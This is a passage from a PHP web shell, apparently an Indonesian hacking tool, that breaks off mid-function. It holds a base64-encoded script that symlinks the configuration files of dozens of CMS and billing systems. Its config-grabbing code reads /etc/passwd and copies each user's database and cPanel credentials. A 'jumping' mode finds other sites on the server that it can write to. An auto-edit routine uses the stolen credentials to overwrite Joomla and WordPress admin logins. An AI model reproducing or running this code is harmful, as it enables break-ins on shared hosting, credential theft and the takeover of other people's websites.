pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
611. $file = "idx_config/vhost.cin";
612. $handle = fopen($file ,"w+");
613. fwrite($handle ,base64_decode($vhost));
614. fclose($handle);
615. chmod($file, 0755);
616. if(exe("cd idx_config && ./vhost.cin")) {
617. echo "<center><a href='$link_config/idx_config'><font color=red>Done</font></a></center>";
618. } else {
619. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=red>Done</font></a></center>";
620. }
621.  
622. } else {
623. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
624. while($passwd = fgets($etc)) {
625. if($passwd == "" || !$etc) {
626. echo "<font color=red>Can't read /etc/passwd</font>";
627. } else {
628. preg_match_all('/(.*?):x:/', $passwd, $user_config);
629. foreach($user_config[1] as $user_idx) {
630. $user_config_dir = "/home/$user_idx/public_html/";
631. if(is_readable($user_config_dir)) {
632. $grab_config = array(
633. "/home/$user_idx/.my.cnf" => "cpanel",
634. "/home/$user_idx/.accesshash" => "WHM-accesshash",
635. "$user_config_dir/po-content/config.php" => "Popoji",
636. "$user_config_dir/vdo_config.php" => "Voodoo",
637. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
638. "$user_config_dir/config/koneksi.php" => "Lokomedia",
639. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
640. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
641. "$user_config_dir/whm/configuration.php" => "WHMCS",
642. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
643. "$user_config_dir/forum/config.php" => "phpBB",
644. "$user_config_dir/sites/default/settings.php" => "Drupal",
645. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
646. "$user_config_dir/app/etc/local.xml" => "Magento",
647. "$user_config_dir/joomla/configuration.php" => "Joomla",
648. "$user_config_dir/configuration.php" => "Joomla",
649. "$user_config_dir/wp/wp-config.php" => "WordPress",
650. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
651. "$user_config_dir/wp-config.php" => "WordPress",
652. "$user_config_dir/admin/config.php" => "OpenCart",
653. "$user_config_dir/slconfig.php" => "Sitelok",
654. "$user_config_dir/application/config/database.php" => "Ellislab");
655. foreach($grab_config as $config => $nama_config) {
656. $ambil_config = file_get_contents($config);
657. if($ambil_config == '') {
658. } else {
659. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
660. fputs($file_config,$ambil_config);
661. }
662. }
663. }
664. }
665. }
666. }
667. echo "<center><a href='?dir=$dir/idx_config'><font color=red>Done</font></a></center>";
668. }
669. } elseif($_GET['do'] == 'jumping') {
670. $i = 0;
671. echo "<div class='margin: 5px auto;'>";
672. if(preg_match("/hsphere/", $dir)) {
673. $urls = explode("\r\n", $_POST['url']);
674. if(isset($_POST['jump'])) {
675. echo "<pre>";
676. foreach($urls as $url) {
677. $url = str_replace(array("http://","www."), "", strtolower($url));
678. $etc = "/etc/passwd";
679. $f = fopen($etc,"r");
680. while($gets = fgets($f)) {
681. $pecah = explode(":", $gets);
682. $user = $pecah[0];
683. $dir_user = "/hsphere/local/home/$user";
684. if(is_dir($dir_user) === true) {
685. $url_user = $dir_user."/".$url;
686. if(is_readable($url_user)) {
687. $i++;
688. $jrw = "[<font color=red>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
689. if(is_writable($url_user)) {
690. $jrw = "[<font color=red>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
691. }
692. echo $jrw."<br>";
693. }
694. }
695. }
696. }
697. if($i == 0) {
698. } else {
699. echo "<br>Total ada ".$i." Kamar di ".$ip;
700. }
701. echo "</pre>";
702. } else {
703. echo '<center>
704. <form method="post">
705. List Domains: <br>
706. <textarea name="url" style="width: 500px; height: 250px;">';
707. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
708. while($getss = fgets($fp)) {
709. echo $getss;
710. }
711. echo '</textarea><br>
712. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
713. </form></center>';
714. }
715. } elseif(preg_match("/vhosts|vhost/", $dir)) {
716. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
717. $urls = explode("\r\n", $_POST['url']);
718. if(isset($_POST['jump'])) {
719. echo "<pre>";
720. foreach($urls as $url) {
721. $url = str_replace("www.", "", $url);
722. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
723. if(is_dir($web_vh) === true) {
724. if(is_readable($web_vh)) {
725. $i++;
726. $jrw = "[<font color=red>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
727. if(is_writable($web_vh)) {
728. $jrw = "[<font color=red>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
729. }
730. echo $jrw."<br>";
731. }
732. }
733. }
734. if($i == 0) {
735. } else {
736. echo "<br>Total ada ".$i." Kamar di ".$ip;
737. }
738. echo "</pre>";
739. } else {
740. echo '<center>
741. <form method="post">
742. List Domains: <br>
743. <textarea name="url" style="width: 500px; height: 250px;">';
744. bing("ip:$ip");
745. echo '</textarea><br>
746. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
747. </form></center>';
748. }
749. } else {
750. echo "<pre>";
751. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
752. while($passwd = fgets($etc)) {
753. if($passwd == '' || !$etc) {
754. echo "<font color=red>Can't read /etc/passwd</font>";
755. } else {
756. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
757. foreach($user_jumping[1] as $user_idx_jump) {
758. $user_jumping_dir = "/home/$user_idx_jump/public_html";
759. if(is_readable($user_jumping_dir)) {
760. $i++;
761. $jrw = "[<font color=red>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
762. if(is_writable($user_jumping_dir)) {
763. $jrw = "[<font color=red>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
764. }
765. echo $jrw;
766. if(function_exists('posix_getpwuid')) {
767. $domain_jump = file_get_contents("/etc/named.conf");
768. if($domain_jump == '') {
769. echo " => ( <font color=red>ERROR</font> )<br>";
770. } else {
771. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
772. foreach($domains_jump[1] as $dj) {
773. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
774. $user_jumping_url = $user_jumping_url['name'];
775. if($user_jumping_url == $user_idx_jump) {
776. echo " => ( <u>$dj</u> )<br>";
777. break;
778. }
779. }
780. }
781. } else {
782. echo "<br>";
783. }
784. }
785. }
786. }
787. }
788. if($i == 0) {
789. } else {
790. echo "<br>Ada ".$i." di ".$ip;
791. }
792. echo "</pre>";
793. }
794. echo "</div>";
795. } elseif($_GET['do'] == 'auto_edit_user') {
796. if($_POST['hajar']) {
797. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
798. echo "username atau password harus lebih dari 6 karakter";
799. } else {
800. $user_baru = $_POST['user_baru'];
801. $pass_baru = md5($_POST['pass_baru']);
802. $conf = $_POST['config_dir'];
803. $scan_conf = scandir($conf);
804. foreach($scan_conf as $file_conf) {
805. if(!is_file("$conf/$file_conf")) continue;
806. $config = file_get_contents("$conf/$file_conf");
807. if(preg_match("/JConfig|joomla/",$config)) {
808. $dbhost = ambilkata($config,"host = '","'");
809. $dbuser = ambilkata($config,"user = '","'");
810. $dbpass = ambilkata($config,"password = '","'");
811. $dbname = ambilkata($config,"db = '","'");
812. $dbprefix = ambilkata($config,"dbprefix = '","'");
813. $prefix = $dbprefix."users";
814. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
815. $db = mysql_select_db($dbname);
816. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
817. $result = mysql_fetch_array($q);
818. $id = $result['id'];
819. $site = ambilkata($config,"sitename = '","'");
820. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
821. echo "Config => ".$file_conf."<br>";
822. echo "CMS => Joomla<br>";
823. if($site == '') {
824. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
825. } else {
826. echo "Sitename => $site<br>";
827. }
828. if(!$update OR !$conn OR !$db) {
829. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
830. } else {
831. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
832. }
833. mysql_close($conn);
834. } elseif(preg_match("/WordPress/",$config)) {
835. $dbhost = ambilkata($config,"DB_HOST', '","'");
836. $dbuser = ambilkata($config,"DB_USER', '","'");
837. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
838. $dbname = ambilkata($config,"DB_NAME', '","'");
839. $dbprefix = ambilkata($config,"table_prefix = '","'");
840. $prefix = $dbprefix."users";
841. $option = $dbprefix."options";
842. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
843. $db = mysql_select_db($dbname);
844. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
845. $result = mysql_fetch_array($q);
846. $id = $result[ID];
847. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
848. $result2 = mysql_fetch_array($q2);
849. $target = $result2[option_value];
850. if($target == '') {
851. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
